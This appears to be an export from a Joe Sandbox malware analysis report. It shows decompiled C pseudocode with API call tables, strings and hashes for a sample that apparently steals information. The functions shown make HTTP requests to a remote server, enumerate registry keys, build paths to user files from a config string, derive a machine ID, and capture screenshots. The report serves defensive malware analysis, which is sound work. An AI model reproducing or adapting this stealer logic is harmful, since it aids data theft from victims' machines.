							_t448 = _t448 + 0x18;
							_t337 =  *0x61567c(_t441);
							_t354 = _v32;
							HttpSendRequestA(_t354, _v96, _t337, _v96, _t353);
							while(1) {
								_t341 = InternetReadFile(_t354,  &_v368, 0xc7,  &_v32); // executed
								if(_t341 == 0) {
									break;
								}
								_t342 = _v32;
								__eflags = _t342;
								if(__eflags != 0) {
									 *((char*)(_t444 + _t342 - 0x16c)) = 0;
									E0041018C(E00410208(_a4, 0,  &_v108, __eflags,  &_v368), 0, _a4);
									E00401859(_v108);
									continue;
								}
								break;
							}
							InternetCloseHandle(_t354);
						}
						InternetCloseHandle(_v36);
					}
				}
				InternetCloseHandle(_v72);
				_t179 = E00405430( &_v40, 0,  &_v44,  *_a4);
				_pop(_t358);
				_t458 = _t179;
				if(_t179 != 0) {
					E00410148(_t358, _a4, 0x411be1);
					E0041018C(E00410208(_a4, _t358,  &_v28, _t458, _v40), _t358, _a4);
					E00401859(_v28);
				}
				_v36 =  &_v40;
				memset(_v36, 0, 4 << 0);
				_v36 =  &_v44;
				memset(_v36, 0, 4 << 0);
				E00401859(_v96);
				E00401859(_v68);
				E00401859(_v16);
				E00401859(_v84);
				E004016CC( &_a8);
				E00401859(_a88);
				return _a4;
			}

0x004045aa
0x004045b6
0x004045be
0x004045c9
0x004045ca
0x004045d4
0x004045dd
0x004045dd
0x004045e8
0x004045f1
0x004045fa
0x00404603
0x0040460c
0x0040461b
0x00404621
0x00404627
0x0040462a
0x00404630
0x0040463b
0x0040463d
0x0040463d
0x00404640
0x00404643
0x0040464e
0x00404655
0x00404664
0x0040466c
0x00404674
0x00404679
0x0040468d
0x00404695
0x004046ad
0x004046b5
0x004046cb
0x004046d3
0x004046eb
0x004046f3
0x00404707
0x0040470f
0x00404730
0x00404738
0x00404740
0x0040475c
0x00404762
0x00404767
0x00404773
0x00404794
0x0040479a
0x0040479d
0x0040479f
0x004047b8
0x004047c0
0x004047d3
0x004047db
0x004047ef
0x004047f7
0x00404810
0x00404818
0x00404831
0x00404839
0x00404851
0x00404859
0x0040486f
0x00404877
0x0040488b
0x00404893
0x004048ab
0x004048b3
0x004048c9
0x004048d1
0x004048e5
0x004048ed
0x00404906
0x0040490e
0x00404927
0x0040492f
0x00404947
0x0040494f
0x00404965
0x0040496d
0x00404975
0x00404986
0x00404992
0x0040499b
0x004049ae
0x004049cc
0x004049ce
0x004049d6
0x004049dc
0x004049e4
0x00404a22
0x00404a2f
0x00404a37
0x00000000
0x00000000
0x004049f1
0x004049f4
0x004049f6
0x004049f8
0x00404a15
0x00404a1d
0x00000000
0x00404a1d
0x00000000
0x004049f6
0x00404a3a
0x00404a3a
0x00404a43
0x00404a43
0x00404767
0x00404a4c
0x00404a5d
0x00404a62
0x00404a63
0x00404a65
0x00404a6f
0x00404a85
0x00404a8d
0x00404a8d
0x00404a95
0x00404aa2
0x00404aa7
0x00404ab4
0x00404ab9
0x00404ac1
0x00404ac9
0x00404ad1
0x00404ad9
0x00404ae1
0x00404aed

APIs

Part of subcall function 0041011F: lstrcpy.KERNEL32(00000000,?), ref: 0041013E

Part of subcall function 00403907: malloc.MSVCRT ref: 00403939
Part of subcall function 00403907: malloc.MSVCRT ref: 0040393F
Part of subcall function 00403907: malloc.MSVCRT ref: 00403945
Part of subcall function 00403907: lstrlen.KERNEL32(000000FF,00000000,?), ref: 00403957
Part of subcall function 00403907: InternetCrackUrlA.WININET(000000FF,00000000), ref: 0040395F

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040461B
StrCmpCA.SHLWAPI(?), ref: 00404633
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040475C
lstrlen.KERNEL32(?,",00413FCC,------,00413FCC,",00413FCC,------), ref: 00404975
lstrlen.KERNEL32(?), ref: 00404980
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040498B
RtlAllocateHeap.NTDLL(00000000), ref: 00404992
lstrlen.KERNEL32(?), ref: 0040499D
memcpy.MSVCRT ref: 004049AE
lstrlen.KERNEL32(?), ref: 004049B6
lstrlen.KERNEL32(?,?,00000000), ref: 004049C3
memcpy.MSVCRT ref: 004049CC
lstrlen.KERNEL32(?,00000000,00000000), ref: 004049D6
HttpSendRequestA.WININET(?,?,00000000), ref: 004049E4
InternetReadFile.WININET(?,?,000000C7,?), ref: 00404A2F
InternetCloseHandle.WININET(?), ref: 00404A3A
InternetCloseHandle.WININET(?), ref: 00404A43
InternetCloseHandle.WININET(?), ref: 00404A4C
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404794

Part of subcall function 00410208: lstrlen.KERNEL32(H@A,76636410,?,0040E45B,00414048,00000000,00414048,00000000), ref: 0041021C
Part of subcall function 00410208: lstrcpy.KERNEL32(00000000,?), ref: 00410244
Part of subcall function 00410208: lstrcat.KERNEL32(?,00000000), ref: 0041024F

Part of subcall function 0041018C: lstrcpy.KERNEL32(00000000,?), ref: 004101BC

Part of subcall function 004101C6: lstrcpy.KERNEL32(00000000,?), ref: 004101F4
Part of subcall function 004101C6: lstrcat.KERNEL32(?,00000000), ref: 004101FE

Strings

", xrefs: 0040483E, 00404934
------, xrefs: 0040469A, 004047A5, 00404898

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlemalloc$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
String ID: "$------
API String ID: 759751014-2370822465
Opcode ID: acfd02e30e29e33282658e0e5721c5226f21a16386cabf9894782fc246ac8b3f
Instruction ID: 273c64a25e486d4b511a4c10b1dc5528a04e94b81e02046c1deb03cd39636527
Opcode Fuzzy Hash: acfd02e30e29e33282658e0e5721c5226f21a16386cabf9894782fc246ac8b3f
Instruction Fuzzy Hash: 7CF1C132D00119EBCF00FBA2DC469DEBB79EF45308F11816AF615B7161D7796E868B88

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB7A Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0040EB7A(void* __eflags, intOrPtr _a4, void* _a8) {
				int _v8;
				void* _v12;
				char _v24;
				void* _v28;
				int* _v32;
				int _v36;
				long _v40;
				char _v52;
				char _v64;
				char _v76;
				char _v88;
				char _v1112;
				char _v2136;
				char _v3160;
				void* __esi;
				long _t62;
				long _t65;
				long _t77;
				long _t82;
				long _t100;
				void* _t119;
				intOrPtr _t122;
				void* _t131;

				_t1 =  &_v24; // 0x414044
				_t121 = _t1;
				E004100ED(_t1, __eflags, 0x411be1);
				_v28 = 0;
				_t4 =  &_a8; // 0x414044
				_v12 = 0;
				_v36 = 0xf003f;
				_v8 = 0;
				_t62 = RegOpenKeyExA( *_t4,  *0x615474, 0, 0x20019,  &_v28); // executed
				_t133 = _t62;
				if(_t62 == 0) {
					_v32 = 0;
					do {
						_v8 = 0x400;
						_t65 = RegEnumKeyExA(_v28, _v32,  &_v2136,  &_v8, 0, 0, 0, 0); // executed
						_v40 = _t65;
						__eflags = _t65;
						if(_t65 != 0) {
							goto L10;
						}
						wsprintfA( &_v3160, "%s\\%s",  *0x615474,  &_v2136);
						_t131 = _t131 + 0x10;
						_t77 = RegOpenKeyExA(_a8,  &_v3160, 0, 0x20019,  &_v12); // executed
						__eflags = _t77;
						if(__eflags != 0) {
							RegCloseKey(_v12);
							L13:
							RegCloseKey(_v28);
							_t122 = _a4;
							E0041011F( &_v24, _t119, _t122, __eflags);
							E00401859(_v24);
							goto L14;
						}
						_v8 = 0x400;
						_t82 = RegQueryValueExA(_v12,  *0x6154e8, 0,  &_v36,  &_v1112,  &_v8); // executed
						__eflags = _t82;
						if(_t82 == 0) {
							__eflags =  *0x61567c( &_v1112) - 1;
							if(__eflags > 0) {
								E0041018C(E00410208( &_v24, _t119,  &_v88, __eflags, "\n\t"), _t119,  &_v24);
								E00401859(_v88);
								E0041018C(E00410208( &_v24, _t119,  &_v52, __eflags,  &_v1112), _t119,  &_v24);
								E00401859(_v52);
								_v8 = 0x400;
								_t100 = RegQueryValueExA(_v12,  *0x615318, 0,  &_v36,  &_v1112,  &_v8); // executed
								__eflags = _t100;
								if(__eflags == 0) {
									E0041018C(E00410208( &_v24, _t119,  &_v76, __eflags, " - "), _t119,  &_v24);
									E00401859(_v76);
									E0041018C(E00410208( &_v24, _t119,  &_v64, __eflags,  &_v1112), _t119,  &_v24);
									E00401859(_v64);
								}
							}
						}
						RegCloseKey(_v12); // executed
						L10:
						_v32 = _v32 + 1;
						__eflags = _v40;
					} while (__eflags == 0);
					goto L13;
				} else {
					_t122 = _a4;
					E0041011F(_t121, _t119, _t122, _t133);
					E00401859(_v24);
					L14:
					return _t122;
				}
			}

0x0040eb8a
0x0040eb8a
0x0040eb8d
0x0040eba4
0x0040eba7
0x0040ebaa
0x0040ebad
0x0040ebb4
0x0040ebb7
0x0040ebbd
0x0040ebbf
0x0040ebd9
0x0040ebe1
0x0040ebf3
0x0040ebf9
0x0040ebff
0x0040ec02
0x0040ec04
0x00000000
0x00000000
0x0040ec23
0x0040ec29
0x0040ec40
0x0040ec46
0x0040ec48
0x0040ed52
0x0040ed58
0x0040ed5b
0x0040ed61
0x0040ed67
0x0040ed6f
0x00000000
0x0040ed74
0x0040ec64
0x0040ec6a
0x0040ec70
0x0040ec72
0x0040ec85
0x0040ec88
0x0040eca1
0x0040eca9
0x0040ecc3
0x0040eccb
0x0040ece6
0x0040ecec
0x0040ecf2
0x0040ecf4
0x0040ed09
0x0040ed11
0x0040ed2b
0x0040ed33
0x0040ed33
0x0040ecf4
0x0040ec88
0x0040ed3b
0x0040ed41
0x0040ed41
0x0040ed44
0x0040ed44
0x00000000
0x0040ebc1
0x0040ebc3
0x0040ebc6
0x0040ebce
0x0040ed76
0x0040ed7a
0x0040ed7a

APIs

Part of subcall function 004100ED: lstrcpy.KERNEL32(00000000,00000000), ref: 00410113

RegOpenKeyExA.KERNEL32(D@AD@A,00000000,00020019,80000002,00411BE1,00000000,?), ref: 0040EBB7
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,00414044), ref: 0040EBF9
wsprintfA.USER32 ref: 0040EC23
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040EC40
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040EC6A
lstrlen.KERNEL32(?), ref: 0040EC7F
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,004140D4), ref: 0040ECEC

Part of subcall function 0041011F: lstrcpy.KERNEL32(00000000,?), ref: 0041013E

Strings

%s\%s, xrefs: 0040EC1D
D@AD@AD@AD@A, xrefs: 0040EB8A
D@AD@A, xrefs: 0040EBA7
- , xrefs: 0040ECF6

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
String ID: - $%s\%s$D@AD@A$D@AD@AD@AD@A
API String ID: 1989970852-3340835996
Opcode ID: c44a8a2bf8d4d6a0ddd61f14e7119f98d554b6f55208edc8fd0e79f3f55055ab
Instruction ID: cfdae271717d10dc87710330834256316bac6531a6ed819a589a496336f84f45
Opcode Fuzzy Hash: c44a8a2bf8d4d6a0ddd61f14e7119f98d554b6f55208edc8fd0e79f3f55055ab
Instruction Fuzzy Hash: 2A510671D0011DEBDF10EBA1DD459EEBBB9EF44309F14406BE602B3161D738AE899B94

Uniqueness

Uniqueness Score: -1.00%

Function 004097BB Relevance: 19.7, APIs: 13, Instructions: 248
stringCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E004097BB(void* __ebx, void* __esi, intOrPtr _a4, signed int _a16) {
				char _v8;
				char _v12;
				void* _v16;
				signed int _v20;
				char _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v116;
				char _v376;
				char _v636;
				short _t89;
				intOrPtr* _t91;
				void* _t101;
				char* _t104;
				void* _t105;
				intOrPtr* _t115;
				intOrPtr* _t147;
				intOrPtr* _t155;
				intOrPtr* _t163;
				intOrPtr* _t171;
				void* _t173;
				void* _t181;
				void* _t184;
				intOrPtr _t185;
				void* _t189;
				signed int _t195;
				void* _t197;
				signed int _t206;
				intOrPtr* _t209;
				intOrPtr _t225;
				intOrPtr _t226;
				void* _t227;
				void* _t230;

				_t197 = __ebx;
				_t89 = 0x7c;
				_v8 = _t89;
				_t91 =  &_v8;
				_v20 = 1;
				__imp__strtok_s(_a4, _t91,  &_v12);
				_t209 = _t91;
				_v16 =  &_v636;
				memset(_v16, 0, 0x104 << 0);
				_v16 =  &_v376;
				memset(_v16, 0, 0x104 << 0);
				_t230 = _t227 + 0x24;
				_t201 = 0;
				if(_t209 == 0) {
					L25:
					return E00401859(_a4);
				} else {
					do {
						_t101 = _v20 - 1;
						if(_t101 == 0) {
							_t223 =  *(_t197 + 0xc) * 0x30 + _a16;
							L21:
							_push(_t209);
							L22:
							E00410148(_t201, _t223);
							goto L23;
						}
						_t105 = _t101 - 1;
						if(_t105 == 0) {
							_v16 =  &_v636;
							memset(_v16, 0, 0x104 << 0);
							_v16 =  &_v376;
							memset(_v16, 0, 0x104 << 0);
							 *0x6157e8( &_v636, _t209);
							_t115 = E0040EFE3( &_v104, 0x10); // executed
							 *0x6157e8( &_v376, E0040F2E0( &_v636,  *0x615350,  *_t115));
							E00401859(_v104);
							 *0x6157e8( &_v376, E0040F2E0( &_v376,  *0x6153d4,  *((intOrPtr*)(E0040EFE3( &_v56, 0x1a)))));
							E00401859(_v56);
							 *0x6157e8( &_v376, E0040F2E0( &_v376,  *0x6153a0,  *((intOrPtr*)(E0040EFE3( &_v32, 0x1c)))));
							E00401859(_v32);
							 *0x6157e8( &_v376, E0040F2E0( &_v376,  *0x615210,  *((intOrPtr*)(E0040EFE3( &_v80, 0x28)))));
							E00401859(_v80);
							_t147 = E0040EFE3( &_v116, 5); // executed
							 *0x6157e8( &_v376, E0040F2E0( &_v376,  *0x615220,  *_t147));
							E00401859(_v116);
							_t155 = E0040EFE3( &_v44, 0x26); // executed
							 *0x6157e8( &_v376, E0040F2E0( &_v376,  *0x615074,  *_t155));
							E00401859(_v44);
							_t163 = E0040EFE3( &_v68, 0x2a); // executed
							 *0x6157e8( &_v376, E0040F2E0( &_v376,  *0x61546c,  *_t163));
							E00401859(_v68);
							_t171 = E0040EFE3( &_v92, 8); // executed
							_t173 = E0040F2E0( &_v376,  *0x615280,  *_t171);
							_t230 = _t230 + 0x78;
							 *0x6157e8( &_v376, _t173);
							E00401859(_v92);
							_t201 = _a16;
							_push( &_v376);
							_t223 =  *(_t197 + 0xc) * 0x30 + _a16 + 0xc;
							goto L22;
						}
						_t181 = _t105 - 1;
						if(_t181 == 0) {
							_t201 = _a16;
							_t223 =  *(_t197 + 0xc) * 0x30 + _a16 + 0x18;
							goto L21;
						}
						_t184 = _t181 - 1;
						if(_t184 == 0) {
							_t206 = 0;
							while(1) {
								_t185 =  *_t209;
								if(_t185 == 0) {
									break;
								}
								_t206 = _t206 * 0xa + _t185 - 0x30;
								_t209 = _t209 + 1;
							}
							 *( *(_t197 + 0xc) * 0x30 + _a16 + 0x24) = _t206;
							goto L23;
						}
						_t189 = _t184 - 1;
						if(_t189 == 0) {
							_push("1");
							_push(_t209);
							_t225 = 0;
							if( *0x615784() == 0) {
								_t225 = 1;
							}
							_t201 = _a16;
							 *((intOrPtr*)( *(_t197 + 0xc) * 0x30 + _a16 + 0x28)) = _t225;
						} else {
							if(_t189 == 1) {
								_push("1");
								_push(_t209);
								_t226 = 0;
								if( *0x615784() == 0) {
									_t226 = 1;
								}
								_t195 =  *(_t197 + 0xc);
								_v20 = _v20 & 0x00000000;
								_t201 = _t195 * 0x30;
								 *((intOrPtr*)(_t195 * 0x30 + _a16 + 0x2c)) = _t226;
								 *(_t197 + 0xc) = _t195 + 1;
							}
						}
						L23:
						_t104 =  &_v8;
						__imp__strtok_s(0, _t104,  &_v12);
						_t230 = _t230 + 0xc;
						_v20 = _v20 + 1;
						_t209 = _t104;
					} while (_t209 != 0);
					goto L25;
				}
			}

0x004097bb
0x004097c7
0x004097c8
0x004097d0
0x004097d7
0x004097de
0x004097e4
0x004097ef
0x004097fc
0x00409804
0x00409811
0x00409811
0x00409811
0x00409815
0x00409afc
0x00409b06
0x0040981b
0x0040981c
0x0040981f
0x00409820
0x00409ad2
0x00409ad5
0x00409ad5
0x00409ad6
0x00409ad6
0x00000000
0x00409ad6
0x00409826
0x00409827
0x004098d4
0x004098e1
0x004098e9
0x004098f6
0x00409900
0x0040990b
0x0040992e
0x00409937
0x00409964
0x0040996d
0x0040999a
0x004099a3
0x004099d0
0x004099d9
0x004099e3
0x00409a06
0x00409a0f
0x00409a19
0x00409a3c
0x00409a45
0x00409a4f
0x00409a72
0x00409a7b
0x00409a85
0x00409a98
0x00409a9d
0x00409aa8
0x00409ab1
0x00409ab6
0x00409abf
0x00409ac6
0x00000000
0x00409ac6
0x0040982d
0x0040982e
0x004098bf
0x004098c5
0x00000000
0x004098c5
0x00409834
0x00409835
0x00409895
0x004098a4
0x004098a4
0x004098a8
0x00000000
0x00000000
0x0040989f
0x004098a3
0x004098a3
0x004098b3
0x00000000
0x004098b3
0x00409837
0x00409838
0x00409870
0x00409875
0x00409876
0x00409880
0x00409882
0x00409882
0x00409886
0x0040988c
0x0040983a
0x0040983b
0x00409841
0x00409846
0x00409847
0x00409851
0x00409853
0x00409853
0x00409854
0x00409857
0x00409860
0x00409864
0x00409868
0x00409868
0x0040983b
0x00409adb
0x00409adf
0x00409ae5
0x00409aeb
0x00409aee
0x00409af1
0x00409af3
0x00000000
0x00409afb

APIs

strtok_s.MSVCRT ref: 004097DE
StrCmpCA.SHLWAPI(00000000,00414070), ref: 00409849

Part of subcall function 0040EFE3: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00411BE1,?), ref: 0040F014

Part of subcall function 0040F2E0: StrStrA.SHLWAPI(?,00000010,?,?,?,00409923,00000000,00000010), ref: 0040F2EB
Part of subcall function 0040F2E0: lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,?,?,?,?,00409923,00000000,00000010), ref: 0040F304
Part of subcall function 0040F2E0: lstrlen.KERNEL32(00000010,?,?,?,00409923,00000000,00000010), ref: 0040F316
Part of subcall function 0040F2E0: wsprintfA.USER32 ref: 0040F328

StrCmpCA.SHLWAPI(00000000,00414070), ref: 00409878
lstrcpy.KERNEL32(?,00000000), ref: 00409900
lstrcpy.KERNEL32(?,00000000), ref: 0040992E
lstrcpy.KERNEL32(?,00000000), ref: 00409964
lstrcpy.KERNEL32(?,00000000), ref: 0040999A
lstrcpy.KERNEL32(?,00000000), ref: 004099D0
lstrcpy.KERNEL32(?,00000000), ref: 00409A06
lstrcpy.KERNEL32(?,00000000), ref: 00409A3C
lstrcpy.KERNEL32(?,00000000), ref: 00409A72
lstrcpy.KERNEL32(?,00000000), ref: 00409AA8
strtok_s.MSVCRT ref: 00409AE5

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcpy$strtok_s$FolderPathlstrcpynlstrlenwsprintf
String ID:
API String ID: 520177711-0
Opcode ID: f40691c7a20bc768ccbc2448b7729a00dca5dff6311435eaa41cc315517d92ba
Instruction ID: 4d7865ef242ecd65a5dff4756963b0b16e97a7679fa44e42d274ab40f94d1956
Opcode Fuzzy Hash: f40691c7a20bc768ccbc2448b7729a00dca5dff6311435eaa41cc315517d92ba
Instruction Fuzzy Hash: B8A16A76900509EBCF10EF61DC45ACEB7B9EB44304F0481BBE90AF72A2EB359A458F54

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7D8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040E7D8(void* __eax) {
				char _v5;
				short _v7;
				char _v8;
				long _v12;
				intOrPtr _v18;
				signed short _v24;
				signed int _v28;
				char _v292;
				void* __esi;
				signed int _t28;
				signed int _t30;
				signed int _t32;
				void* _t42;
				CHAR* _t44;
				void* _t45;
				void* _t46;

				_t45 = __eax;
				_v12 = 0;
				if(GetWindowsDirectoryA( &_v292, 0x104) == 0) {
					_v292 = 0x43;
				}
				_v8 = _v292;
				_v7 = 0x5c3a;
				_v5 = 0;
				GetVolumeInformationA( &_v8, 0, 0,  &_v12, 0, 0, 0, 0); // executed
				_t28 = _v12 * 0x14a30b - 0x69427551;
				_v28 = _t28;
				_t30 = _t28 * 0x14a30b - 0x69427551;
				_v24 = _t30;
				_t32 = _t30 * 0x14a30b - 0x69427551;
				_t42 = 0;
				do {
					_t32 = _t32 * 0x14a30b - 0x69427551;
					 *(_t46 + _t42 - 0x10) = _t32;
					_t42 = _t42 + 1;
				} while (_t42 < 8);
				_v12 = _t32;
				_t44 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t52 = _t44;
				if(_t44 != 0) {
					wsprintfA(_t44,  *0x61502c, _v28, _v24 & 0x0000ffff, _v18);
					_push(_t44);
				} else {
					_push(0);
				}
				E004100ED(_t45, _t52);
				return _t45;
			}

0x0040e7e4
0x0040e7f5
0x0040e800
0x0040e802
0x0040e802
0x0040e813
0x0040e820
0x0040e826
0x0040e829
0x0040e83d
0x0040e83f
0x0040e848
0x0040e84a
0x0040e854
0x0040e856
0x0040e858
0x0040e85e
0x0040e860
0x0040e864
0x0040e865
0x0040e86c
0x0040e87c
0x0040e87e
0x0040e880
0x0040e897
0x0040e8a0
0x0040e882
0x0040e882
0x0040e882
0x0040e8a1
0x0040e8ac

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00411BE1), ref: 0040E7F8
GetVolumeInformationA.KERNEL32(?,00000000,00000000,0040D419,00000000,00000000,00000000,00000000,?,?,00411BE1), ref: 0040E829
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00411BE1), ref: 0040E86F
RtlAllocateHeap.NTDLL(00000000), ref: 0040E876
wsprintfA.USER32 ref: 0040E897

Strings

C, xrefs: 0040E802
QuBi, xrefs: 0040E838
:\, xrefs: 0040E820

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
String ID: :\$C$QuBi
API String ID: 2572753744-239756005
Opcode ID: 4e68d9a3f2f5716429ce6b4cbf68c0a3608698b5125306ea2b38b7096cce243b
Instruction ID: fc8dd47cad2dcc7d3a0d47035d045ba1b97331e4aa2d061e7f22558a09cac201
Opcode Fuzzy Hash: 4e68d9a3f2f5716429ce6b4cbf68c0a3608698b5125306ea2b38b7096cce243b
Instruction Fuzzy Hash: 2721B3B2904109FEDB019FB99D889EEFEBDEF9D344F0491BAF101E2161E2348A518765

Uniqueness

Uniqueness Score: -1.00%

Function 0040F138 Relevance: 13.6, APIs: 9, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E0040F138(char _a4) {
				char _v8;
				void* _v12;
				char _v16;
				struct HDC__* _v20;
				struct HWND__* _v24;
				char _v28;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				char _v52;
				int _v56;
				int _v60;
				int _v64;
				char _v68;
				struct tagRECT _v84;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t55;
				void* _t59;
				struct HDC__* _t64;
				void* _t65;
				void* _t66;
				void* _t69;
				void* _t71;
				void* _t73;
				void* _t75;
				void* _t95;
				intOrPtr _t98;
				void* _t104;
				void* _t105;

				_v68 = 1;
				_v64 = 0;
				_v60 = 0;
				_v56 = 0;
				_v32 =  &_v68;
				memset(_v32, 0, 0x10 << 0);
				_t105 = _t104 + 0xc;
				_v68 = 1;
				_t55 =  *0x615768( &_v28,  &_v68, 0); // executed
				if(_t55 == 0) {
					_t59 =  *0x6156ec(0, 1,  &_v8); // executed
					if(_t59 == 0) {
						_v24 = GetDesktopWindow();
						GetWindowRect(_v24,  &_v84);
						_t98 =  *0x6157c8(_v24);
						_v40 = _t98;
						_t64 =  *0x6156b0(_t98);
						_v20 = _t64;
						_t65 =  *0x61562c(_t98, _v84.right, _v84.bottom);
						_v32 = _t65;
						_t66 = SelectObject(_v20, _t65);
						_v36 = _t66;
						 *0x6155fc(_v20, 0, 0, _v84.right, _v84.bottom, _t98, 0, 0, 0xcc0020);
						_t69 =  *0x615738(_v32, 0,  &_v16); // executed
						if(_t69 == 0) {
							_t71 = E0040F09E( &_v100);
							_pop(_t95);
							if(_t71 != 0xffffffff) {
								_t73 =  *0x615708(_v16, _v8,  &_v100, 0); // executed
								_t113 = _t73;
								if(_t73 == 0) {
									_t75 =  *0x615604(_v8,  &_v12);
									GlobalFix(_v12);
									_t106 = _t105 - 0xc;
									E004100ED(_t105 - 0xc, _t113,  *0x6151cc);
									E004016EB( &_a4, _t106 - 0x50);
									E00403F95(_t95, _t113); // executed
									E00401859(_v52);
									SelectObject(_v20, _v36);
									 *0x615668(_v16,  &_v52, _t75, GlobalSize(_v12)); // executed
									 *0x615750(_v28);
									DeleteObject(_v32);
									DeleteObject(_v20);
									 *0x615760(_v24, _v40);
									CloseWindow(_v24); // executed
								}
							}
						}
					}
				}
				E004016CC( &_a4);
				return 0;
			}

0x0040f149
0x0040f14c
0x0040f14f
0x0040f152
0x0040f155
0x0040f162
0x0040f162
0x0040f16d
0x0040f170
0x0040f178
0x0040f184
0x0040f18c
0x0040f198
0x0040f1a2
0x0040f1b1
0x0040f1b4
0x0040f1b7
0x0040f1c0
0x0040f1c7
0x0040f1d1
0x0040f1d4
0x0040f1e5
0x0040f1f0
0x0040f1fe
0x0040f206
0x0040f210
0x0040f215
0x0040f219
0x0040f22a
0x0040f230
0x0040f232
0x0040f23f
0x0040f248
0x0040f25b
0x0040f266
0x0040f273
0x0040f27c
0x0040f287
0x0040f292
0x0040f29b
0x0040f2a4
0x0040f2ad
0x0040f2b6
0x0040f2c2
0x0040f2cb
0x0040f2cb
0x0040f232
0x0040f219
0x0040f206
0x0040f18c
0x0040f2d4
0x0040f2df

APIs

GetDesktopWindow.USER32 ref: 0040F192
GetWindowRect.USER32(?,?), ref: 0040F1A2
